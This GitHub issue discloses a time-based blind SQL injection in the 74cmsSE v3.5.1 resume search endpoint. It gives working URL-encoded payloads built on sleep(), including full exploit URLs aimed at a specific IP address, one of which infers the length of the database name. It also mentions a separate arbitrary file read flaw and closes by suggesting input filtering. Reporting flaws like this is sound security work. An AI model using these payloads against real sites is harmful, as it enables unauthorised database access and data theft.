Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection vulnerability #9

Open
PAINCLOWN opened this issue Jun 9, 2022 · 0 comments
Open

SQL Injection vulnerability #9

PAINCLOWN opened this issue Jun 9, 2022 · 0 comments

Comments

@PAINCLOWN
Copy link
Owner

@PAINCLOWN PAINCLOWN commented Jun 9, 2022

Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.5.1
Date of Discovery: 21/4/2022
Product version: 74cmsSE_v3.5.1
Download linkhttp://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
74cmsSE_v3.5.1 has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data.

POC:
Payload:
/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

In the path:
/v1_0/home/resume/index
is not strictly filtered for $keyword, resulting in SQL injection
exp1:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

WKE)19@(_`~2P}JL1%6KK@J

As you can see from the figure above, the sleep() function is executed, and there is a time blind-SQL
With the payload test above it is possible that the sleep() function being executed twice.
Time blinds are possible to guess the length of the database:
exp2:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=

~CNR1C8{BESIQM9TDVKS(8S

As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is "qscms2" , and the delay as exactly double the length of database(), so the injection is successfull
image

It's a time-based SQL injection
Suggest: Add a filter function to this parameter

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant